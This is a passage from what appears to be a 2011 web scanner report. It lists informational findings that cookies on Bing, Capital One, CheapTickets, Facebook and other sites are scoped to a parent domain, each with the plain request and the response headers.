The following cookies were issued by the application and is scoped to a parent of the issuing domain:

from=en-us_msnhp; domain=.bing.com; path=/videos
gt1=42006; domain=.bing.com; path=/videos
ocid=42006; domain=.bing.com; path=/videos
_SS=SID=6E5A086A9AF74D6F91B72385C55EFF40; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:19 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c167cdd32c1d54aa292824403b8d50b5f; expires=Fri, 01-Feb-2013 15:43:19 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:20 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/earthquake-proof-bridge/pfu8x7j?q=Bridge&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42006 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

11.299. http://www.bing.com/videos/watch/video/ice-cube-talks-tv-film-and-music/6vztnpj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/ice-cube-talks-tv-film-and-music/6vztnpj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

from=en-us_msnhp; domain=.bing.com; path=/videos
gt1=42007; domain=.bing.com; path=/videos
ocid=42007; domain=.bing.com; path=/videos
_SS=SID=7C5FE46609BE4E3A9076C3F8E41856C4; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:18 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cdd20830f9ef94917afbd4f441898d81d; expires=Fri, 01-Feb-2013 15:43:18 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:19 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/ice-cube-talks-tv-film-and-music/6vztnpj?q=are+we+there+yet&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42007 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

11.300. http://www.bing.com/videos/watch/video/jay-mohr-part-1/17wj9ueo7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/jay-mohr-part-1/17wj9ueo7

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

from=en-us_msnhp; domain=.bing.com; path=/videos
gt1=42008; domain=.bing.com; path=/videos
ocid=42008; domain=.bing.com; path=/videos
_SS=SID=D2547B15F9A24BA98E03DAB3C7FFE7C8; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:17 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c37fc55856c584608a47042f42a9be2a2; expires=Fri, 01-Feb-2013 15:43:17 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:18 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/jay-mohr-part-1/17wj9ueo7?q=Justin+Bieber&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

11.301. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

from=en-us_msnhp; domain=.bing.com; path=/videos
_SS=SID=5A86ECC36E34429890A9098D97A000AD; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:28 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c0b86cfda968c42abbd8910da2588a90e; expires=Fri, 01-Feb-2013 15:43:28 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:28 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

11.302. http://www.bing.com/videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=D1AB7D58E73848B48ED1B91EE1D196FE; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Thu, 31-Jan-2013 15:39:07 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c4b33e784809849ac99aa3617334dea9b; expires=Thu, 31-Jan-2013 15:39:07 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1623819&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:39:07 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 75615
Content-Type: text/html; charset=utf-8
Expires: Tue, 01 Feb 2011 15:54:07 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.406 secs
X-UA-Compatible: IE=7
Date: Tue, 01 Feb 2011 15:39:07 GMT
Connection: close
Set-Cookie: _SS=SID=D1AB7D58E73848B48ED1B91EE1D196FE; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Thu, 31-Jan-2013 15:39:07 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c4b33e784809849ac99aa3617334dea9b; expires=Thu, 31-Jan-2013 15:39:07 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1623819&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:39:07 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

11.303. http://www.capitalone.com/creditcards/orbitz/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/creditcards/orbitz/index.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

v1st=CB900D89605E0146; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
itc=CAPITALONE11NZZZintmktgD4; expires=Sun, 03-Apr-2011 15:44:26 GMT; path=/; domain=.capitalone.com
external_id=WWW_ZZORBZ_BNUSCD_QS_FB_11_ZZ_ZZ_PARTNER%5C%5C; path=/; domain=.capitalone.com
caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com
caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /creditcards/orbitz/index.php?external_id=WWW_ZZORBZ_BNUSCD_QS_FB_11_ZZ_ZZ_PARTNER\ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:44:26 GMT
Server: Apache
Set-Cookie: v1st=CB900D89605E0146; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: itc=CAPITALONE11NZZZintmktgD4; expires=Sun, 03-Apr-2011 15:44:26 GMT; path=/; domain=.capitalone.com
Set-Cookie: external_id=WWW_ZZORBZ_BNUSCD_QS_FB_11_ZZ_ZZ_PARTNER%5C%5C; path=/; domain=.capitalone.com
Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com
Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerpl_capitalone.com_80=795419914.29215.0000; path=/
Content-Length: 21899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

11.304. http://www.cheaptickets.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cheaptickets.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

anon=6141560721296661466911; Domain=.cheaptickets.com; Expires=Tue, 28-Jan-2031 15:44:26 GMT; Path=/
OrbitzRegistration="N,0,0,0"; Domain=.cheaptickets.com; Expires=Tue, 28-Jan-2031 15:44:26 GMT; Path=/
BetaGroup="02/02/2011 09:44:26|A|A|N|C|N|H|B|P|N"; Domain=.cheaptickets.com; Expires=Wed, 16-Feb-2011 15:44:26 GMT; Path=/
logging=41A0C8377E063EDF9406ACA3829AA4EF|egapp12p|; Domain=.cheaptickets.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.cheaptickets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.305. http://www.demandstudios.com/ehow-writers.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.demandstudios.com
Path:	/ehow-writers.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

BIGipServerdemandstudios.com-69.64.153.116-80=613812490.20480.0000; path=/ ; domain=demandstudios.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ehow-writers.html HTTP/1.1
Host: www.demandstudios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.306. http://www.ehow.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

google-autocomplete=autocomplete; domain=.ehow.com; expires=Wed, 09-Feb-2011 15:11:14 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.307. http://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

lsd=J5foX; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=J5foX; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Wed, 02 Feb 2011 21:51:01 GMT
Content-Length: 30789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.308. http://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.309. http://www.facebook.com/%s previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/%s

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /%s HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 04:07:30 GMT
Content-Length: 11401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.310. http://www.facebook.com/2008/fbml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/2008/fbml

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 04:07:31 GMT
Content-Length: 11422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.311. http://www.facebook.com/MillenniumHotels previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/MillenniumHotels

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /MillenniumHotels HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

11.312. http://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ajax/intl/language_dialog.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-FB-Server: 10.37.21.104
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 02 Feb 2011 19:23:14 GMT
Content-Length: 43524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.313. http://www.facebook.com/ajax/reg_birthday_help.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/reg_birthday_help.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ajax/reg_birthday_help.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
